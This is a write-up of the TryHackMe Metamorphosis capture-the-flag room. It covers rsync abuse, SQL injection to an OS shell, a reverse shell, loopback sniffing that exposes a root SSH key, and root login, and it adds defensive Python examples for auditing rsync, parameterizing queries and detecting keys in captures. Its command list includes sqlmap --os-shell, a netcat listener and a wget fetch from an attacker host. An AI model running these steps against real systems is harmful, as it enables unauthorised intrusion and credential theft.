Introduction
In this walkthrough, we cover enumerating rsync and sniffing loopback traffic with Tcpdump to extract sensitive information, as part of the Incognito CTF Metamorphosis room on TryHackMe.
Initial Reconnaissance
My first step was to run an Nmap scan to see what services were running on the machine. The scan revealed several open ports, including SSH (22), HTTP (80), SMB (139 and 445), and most interestingly, rsync (873). The rsync service immediately caught my eye as a potential entry point.
Next, I turned my attention to the web server on port 80. It was just a default Apache page, so I fired up Gobuster to look for hidden directories. Gobuster found /index.php and /admin, but trying to access /admin gave me a “403 Forbidden” error. Looking at the page’s source code, I found a clue: the admin functionality was only available in a “development environment.” This told me I needed to find and modify a configuration file, likely a web.ini file, to switch the environment from “production” to “development.”
Exploiting Rsync
With the web server at a temporary dead end, I went back to the rsync service. I used an Nmap script to list the available rsync modules and found one named “conf.” I then used the rsync command to list the contents of this “conf” module, which revealed several configuration files, including mysql.ini and, just as I suspected, web.ini.
I downloaded these files to my machine and, upon inspecting web.ini, I found a set of hardcoded credentials: username “tom” and password “cat.” I also saw the environment variable was set to “production.” I changed this to “development” and then used rsync to upload the modified web.ini file back to the target machine.
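The root cause on the rsync side is a module that is listable, writable, unauthenticated and reachable from anywhere, which is what allowed a modified web.ini to be pushed back. The following Python script is an added example, not part of this writeup or the room: it parses an rsyncd.conf-style file with the standard library configparser (global parameters before the first [module] act as defaults, as rsync itself treats them) and flags the weak settings. Both configurations are constructed samples; the module name “conf” is borrowed from the room, the paths and addresses are made up.

```python
import configparser

# Constructed sample of an exposed module: writable, listable, no auth, served as root.
WEAK_RSYNCD_CONF = """\
uid = root
gid = root

[conf]
path = /var/www/conf
comment = application configuration
read only = no
list = yes
"""

# Constructed sample of the same module with the usual hardening applied.
HARDENED_RSYNCD_CONF = """\
uid = nobody
gid = nogroup
use chroot = yes

[conf]
path = /srv/rsync/conf
read only = yes
list = no
auth users = deploy
secrets file = /etc/rsyncd.secrets
hosts allow = 10.10.0.0/16
"""

TRUE_VALUES = {"yes", "true", "1"}


def _is_true(value, default):
    """rsync boolean parameters accept yes/true/1 and no/false/0; absent means the default."""
    if value is None:
        return default
    return value.strip().lower() in TRUE_VALUES


def parse_rsyncd_conf(text):
    """Parse rsyncd.conf; parameters before the first [module] become defaults for every module."""
    parser = configparser.ConfigParser(
        interpolation=None, default_section="global", inline_comment_prefixes=("#", ";"))
    parser.read_string("[global]\n" + text)
    return parser


def audit_rsyncd_conf(text):
    """Return {module: [finding, ...]} using rsync's documented defaults (read only=yes, list=yes, use chroot=yes)."""
    parser = parse_rsyncd_conf(text)
    report = {}
    for name in parser.sections():
        mod = parser[name]          # .get() falls back to the global defaults automatically
        findings = []
        if not _is_true(mod.get("read only"), True):
            findings.append("writable")        # clients can replace files in the module
        if not mod.get("auth users"):
            findings.append("no-auth-users")   # no rsync-level authentication at all
        if not mod.get("hosts allow"):
            findings.append("no-hosts-allow")  # any source address may connect
        if _is_true(mod.get("list"), True):
            findings.append("listable")        # module name shows up in a module listing
        if (mod.get("uid") or "").strip() in {"root", "0"}:
            findings.append("runs-as-root")    # files are read and written with root privileges
        if not _is_true(mod.get("use chroot"), True):
            findings.append("no-chroot")
        report[name] = findings
    return report


if __name__ == "__main__":
    print("weak:    ", audit_rsyncd_conf(WEAK_RSYNCD_CONF))
    print("hardened:", audit_rsyncd_conf(HARDENED_RSYNCD_CONF))
```

The hardened sample does more than flip read only: it restricts who may connect (hosts allow), requires a module password (auth users with a secrets file), stops the module from appearing in listings, and drops root so that a future writable module cannot be used to overwrite root-owned files.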
SQL Injection and a Reverse Shell
With the environment now set to “development,” I was able to access the /admin page. The page had an input field to get user information. I fired up Burp Suite to intercept the request and then used SQLMap to test for SQL injection vulnerabilities on the username parameter. SQLMap quickly found a vulnerability and even gave me an OS shell!
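The lookup form above fails because the username parameter is pasted into the SQL text. The following Python snippet is an added example, not the room’s code (which is PHP and not reproduced here): it uses an in-memory sqlite3 table with constructed users to show the concatenated query beside the parameterized one that a fix would use. The table contents and column names are assumptions.

```python
import sqlite3


def make_demo_db():
    """Constructed in-memory users table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("tom", "tom@example.test"), ("alice", "alice@example.test")])
    return conn


def lookup_user_vulnerable(conn, username):
    """String concatenation: whatever the client sends becomes part of the SQL statement."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_user_parameterized(conn, username):
    """Bound parameter: the driver sends the value separately, so it is only ever compared as data."""
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)).fetchall()


def demo(username):
    """Run the same input through both lookups on a fresh database and return (vulnerable, parameterized)."""
    conn = make_demo_db()
    return lookup_user_vulnerable(conn, username), lookup_user_parameterized(conn, username)


if __name__ == "__main__":
    for candidate in ("tom", "' OR '1'='1"):
        vulnerable, safe = demo(candidate)
        print(repr(candidate), "-> concatenated:", vulnerable, "| parameterized:", safe)
```

The parameterized version returns nothing for the tautology input because the whole string is compared against the username column; the concatenated version turns it into a WHERE clause that is always true and leaks every row. In the room’s case that same weakness was severe enough for SQLMap to reach an OS shell, which is why the fix has to be in the query construction, not in filtering.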
From there, I tried a few different reverse shell one-liners and successfully got a connection back to my machine using a PHP reverse shell. I now had a shell as the www-data user.
Privilege Escalation
To escalate my privileges, I downloaded and ran pspy, a tool that monitors running processes. Pspy revealed a recurring curl process running as root. This process was accessing a local port (1027) and passing a parameter. This looked like a promising vector for privilege escalation.
Since the curl process was accessing a local port, I used tcpdump on the target machine to sniff the traffic on the loopback interface and saved it to a pcap file. I then transferred this file back to my machine and opened it in Wireshark. Analyzing the captured traffic, I found an SSH private key within the HTTP response of the curl request.
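Spotting the key in Wireshark by eye works for one capture; the same check can be automated and run over any loopback capture. The following Python script is an added example, not part of this writeup or the room: it parses a classic pcap file with only the standard library, reassembles each TCP flow’s payload in capture order, and reports flows that carry a PEM private key header. The capture it scans is constructed inline (port 1027 is borrowed from the room, the client port and the placeholder key are made up), and it assumes Ethernet-framed records, which is what tcpdump writes for the Linux loopback interface.

```python
import re
import socket
import struct

# Header every PEM-style private key starts with; the group captures the key type.
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN ([A-Z ]*PRIVATE KEY)-----")


def _pcap_frames(data):
    """Yield the link-layer frames of a classic (non-pcapng) capture file."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"      # written by a little-endian host
    elif magic == 0xD4C3B2A1:
        endian = ">"      # written by a big-endian host
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("this example only handles Ethernet-framed captures")
    offset = 24
    while offset + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[offset:offset + 16])[2]
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def _tcp_segment(frame):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    if ip[9] != 6:                                   # IP protocol 6 = TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return (socket.inet_ntoa(ip[12:16]), sport,
            socket.inet_ntoa(ip[16:20]), dport, tcp[data_off:])


def reassemble_flows(pcap_bytes):
    """Concatenate payloads per direction of each TCP connection, in capture order (no seq reordering)."""
    flows = {}
    for frame in _pcap_frames(pcap_bytes):
        seg = _tcp_segment(frame)
        if seg is None:
            continue
        src, sport, dst, dport, payload = seg
        key = f"{src}:{sport} -> {dst}:{dport}"
        flows[key] = flows.get(key, b"") + payload
    return flows


def find_leaked_keys(pcap_bytes):
    """Return [(flow, key type)] for every private key header found in a reassembled flow."""
    return [(flow, m.group(1).decode())
            for flow, stream in reassemble_flows(pcap_bytes).items()
            for m in PRIVATE_KEY_RE.finditer(stream)]


def find_leaked_keys_per_packet(pcap_bytes):
    """Naive variant that scans each segment alone, so a header split across two packets is missed."""
    hits = []
    for frame in _pcap_frames(pcap_bytes):
        seg = _tcp_segment(frame)
        if seg and PRIVATE_KEY_RE.search(seg[4]):
            hits.append(f"{seg[0]}:{seg[1]} -> {seg[2]}:{seg[3]}")
    return hits


def build_pcap(segments):
    """Write a constructed Ethernet/IPv4/TCP capture; checksums are left zero since parsing ignores them."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, (src, sport, dst, dport, payload) in enumerate(segments):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                         socket.inet_aton(src), socket.inet_aton(dst)) + tcp
        frame = b"\x00" * 12 + b"\x08\x00" + ip
        out += struct.pack("<IIII", 0, i, len(frame), len(frame)) + frame
    return out


# Constructed loopback exchange: the request, then a response whose key header spans two segments.
SAMPLE_CAPTURE = build_pcap([
    ("127.0.0.1", 51234, "127.0.0.1", 1027, b"GET / HTTP/1.1\r\nHost: 127.0.0.1:1027\r\n\r\n"),
    ("127.0.0.1", 1027, "127.0.0.1", 51234,
     b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n-----BEGIN OPENSSH PRI"),
    ("127.0.0.1", 1027, "127.0.0.1", 51234,
     b"VATE KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END OPENSSH PRIVATE KEY-----\n"),
])

if __name__ == "__main__":
    print("reassembled:", find_leaked_keys(SAMPLE_CAPTURE))
    print("per packet: ", find_leaked_keys_per_packet(SAMPLE_CAPTURE))
```

The per-packet scan is included to show why flow reassembly matters: a marker that straddles a segment boundary is invisible to a grep over individual packets. The reassembly here is deliberately simple (capture order, no sequence-number handling), which is fine for a short loopback capture but would need proper TCP reassembly, as Wireshark does, for lossy or out-of-order traffic.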
Getting Root
I saved the SSH private key to a file, gave it the correct permissions, and then used it to SSH into the machine as the root user. Success! I had full root access. From there, it was a simple matter of finding the root flag in /root/root.txt and the user flag in /home/user/user.txt.
Technical Commands
Here are some of the key commands I used during this engagement:
- Gobuster for directory enumeration:
sudo gobuster dir -u http://[IP_ADDRESS] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
- Nmap Scripting Engine for rsync enumeration:
ls -la /usr/share/nmap/scripts | grep rsync
sudo nmap --script rsync-list-modules -p 873 [IP_ADDRESS]
- Rsync for listing and downloading files:
rsync rsync://[IP_ADDRESS]/conf
mkdir rsync
rsync -av rsync://[IP_ADDRESS]/conf ./rsync
- Rsync for uploading files:
rsync -av web.ini rsync://[IP_ADDRESS]/conf/web.ini
- SQLMap for SQL injection:
sqlmap -r request --dbs --level 5 --risk 3 --os-shell
- Netcat listener:
nc -lvp 4545
- Python HTTP server:
python3 -m http.server
- Wget for downloading files:
wget http://[ATTACKER_IP]:8000/pspy64s
- Changing file permissions:
chmod +x pspy64s
- Running pspy:
./pspy64s
- Tcpdump for sniffing traffic:
sudo tcpdump -i lo -w curl.pcapp
- Moving files:
mv curl.pcapp /var/www/html
- SSH with private key:
chmod 600 id_rsa
ssh -i id_rsa root@[IP_ADDRESS]
- Listing and reading flags:
ls
cat root.txt
cat user.txt
Metamorphosis TryHackMe Room Answers
root.txt